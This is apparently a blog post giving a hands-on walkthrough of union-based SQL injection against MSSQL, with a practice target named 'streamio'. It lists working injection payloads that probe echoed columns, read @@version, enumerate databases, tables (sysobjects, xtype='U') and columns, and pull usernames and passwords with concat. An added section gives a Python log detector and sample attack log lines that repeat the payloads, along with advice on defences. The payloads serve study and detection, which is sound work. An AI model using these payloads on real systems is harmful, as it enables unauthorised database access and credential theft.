MSSQL database hands-on practice

MSSQL COMMANDS

Listing the databases of an MSSQL instance

SQL>select name from master..sysdatabases;

name

--------------------------------------------------------------------------------------------------------------------------------

master

tempdb

model

msdb

 

Finding the echoed column positions

1' union select 1,2,3,4,5,6;-- -

Columns 2 and 3 are echoed back in the page

Detecting the MSSQL version

1' union select 1,@@version,3,4,5,6;-- - 

Confirming the current database

1' union select 1,db_name(),3,4,5,6;-- - ##error
--
Apart from system variables such as @@version, the value has to be brought out with a subquery and a FROM clause against master..sysdatabases:
1' union select 1,(select db_name()),3,4,5,6 from master..sysdatabases;-- - ##true

Enumerating the tables of the current database, streamio (the value returned by db_name())

1' union select 1,name,id,4,5,6 from streamio..sysobjects where xtype='U';-- -
--
Tip: user-created tables are stored in sysobjects with the storage type xtype 'U', so xtype must be specified when querying for tables.

Enumerating the columns using the table name and object id

1' union select 1,col_name(object_id('users'),2),3,4,5,6 from sysobjects;-- - X ##error
--
a. the database that owns sysobjects has to be specified (streamio..sysobjects)
b. when querying columns, col_name(object_id('table'), n) is used together with the object id from the table query
--
1' union select 1,col_name(object_id('users'),2),3,4,5,6 from streamio..sysobjects where id in (885578193,9051578250);-- -

Extracting the data stored in the columns

1' union select 1,concat(username,0x7e,password),3,4,5,6 from users;-- -
1' union select 1,concat(username,':',password),3,4,5,6 from users;-- -
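The steps above leave a recognisable trail in the web server's access log: a numeric UNION SELECT probe, then @@version, then reads of master..sysdatabases / <db>..sysobjects, then col_name(object_id(...)), then concat(...) over the target table. The following Python script is an added detection example, not part of the original post: it parses constructed combined-format log lines (the hostnames, IPs, timestamps and the "streamio"/"users" names are assumed sample values), URL-decodes the request path, maps each request to the enumeration stage it corresponds to, and raises the severity for a source that walks through several stages.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (combined format); not taken from the original post.
SAMPLE_LOG = """\
10.0.0.5 - - [03/Oct/2023:23:01:12 +0800] "GET /item?id=1 HTTP/1.1" 200 512
10.0.0.9 - - [03/Oct/2023:23:01:40 +0800] "GET /item?id=1'%20union%20select%201,2,3,4,5,6;--%20- HTTP/1.1" 500 0
10.0.0.9 - - [03/Oct/2023:23:02:03 +0800] "GET /item?id=1'%20union%20select%201,@@version,3,4,5,6;--%20- HTTP/1.1" 200 1024
10.0.0.9 - - [03/Oct/2023:23:02:30 +0800] "GET /item?id=1'%20union%20select%201,name,id,4,5,6%20from%20streamio..sysobjects%20where%20xtype='U';--%20- HTTP/1.1" 200 2048
10.0.0.9 - - [03/Oct/2023:23:03:11 +0800] "GET /item?id=1'%20union%20select%201,col_name(object_id('users'),2),3,4,5,6%20from%20streamio..sysobjects;--%20- HTTP/1.1" 200 900
10.0.0.9 - - [03/Oct/2023:23:03:50 +0800] "GET /item?id=1'%20union%20select%201,concat(username,':',password),3,4,5,6%20from%20users;--%20- HTTP/1.1" 200 4096
10.0.0.7 - - [03/Oct/2023:23:04:00 +0800] "GET /search?q=union+station HTTP/1.1" 200 300
"""

# Combined log format: ip ident user [timestamp] "METHOD path proto" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Each rule maps an enumeration stage from the write-up to a pattern over the decoded path.
STAGE_RULES = [
    ("column-count probe", re.compile(r"union\s+(?:all\s+)?select\s+(?:\d+\s*,\s*)*\d+\s*;?\s*--", re.I)),
    ("version probe", re.compile(r"@@version", re.I)),
    ("database enumeration", re.compile(r"master\.\.sysdatabases|\bdb_name\s*\(", re.I)),
    ("table enumeration", re.compile(r"\.\.sysobjects\b.*\bxtype\s*=\s*'U'", re.I)),
    ("column enumeration", re.compile(r"\bcol_name\s*\(\s*object_id\s*\(", re.I)),
    ("data extraction", re.compile(r"union\s+(?:all\s+)?select\b.*\bconcat\s*\(", re.I)),
]
UNION_RE = re.compile(r"union\s+(?:all\s+)?select\b", re.I)


def parse_line(line):
    """Parse one combined-format line; return a dict with the URL-decoded path, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = unquote_plus(rec["path"])  # %20 and + both become spaces
    return rec


def classify(path):
    """Return the enumeration stages a decoded request path matches (empty list if benign)."""
    stages = [name for name, rx in STAGE_RULES if rx.search(path)]
    if not stages and UNION_RE.search(path):
        stages.append("unclassified UNION SELECT")
    return stages


def scan_log(text):
    """Scan log text and return one finding per request that matches a stage."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        stages = classify(rec["path"])
        if stages:
            findings.append({"ip": rec["ip"], "ts": rec["ts"],
                             "status": rec["status"], "stages": stages})
    return findings


def summarize_by_source(findings):
    """Group distinct stages per source IP, in first-seen order."""
    seen = {}
    for f in findings:
        bucket = seen.setdefault(f["ip"], [])
        for s in f["stages"]:
            if s not in bucket:
                bucket.append(s)
    return seen


def severity(stages):
    """A source that reaches data extraction, or walks three or more stages, is high severity."""
    if "data extraction" in stages or len(stages) >= 3:
        return "high"
    return "medium" if stages else "none"


if __name__ == "__main__":
    summary = summarize_by_source(scan_log(SAMPLE_LOG))
    for ip, stages in summary.items():
        print(f"{ip}: {severity(stages)} - {' -> '.join(stages)}")
```

The rules deliberately key on the catalog names and metadata functions rather than on the word "union" alone, so the benign "union station" search is not flagged; the per-source progression is what turns a single odd request into an alert worth paging on. A WAF signature tuned the same way, together with parameterised queries in the application, closes the path the write-up walks.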

End of steps

Summary

The vital things in MSSQL queries are as follows:

1. two system-level catalog views: master..sysdatabases and <db_name()>..sysobjects

2. a table query has to distinguish the xtype value: SQL Server stores different kinds of objects in sysobjects, user-created tables with xtype 'U' and system tables with xtype 'S'

3. if the data stored in a column is too large for the echoed position, concat has to be used to bring the data out without truncation

posted @ 2023-10-03 23:07 lisenMiller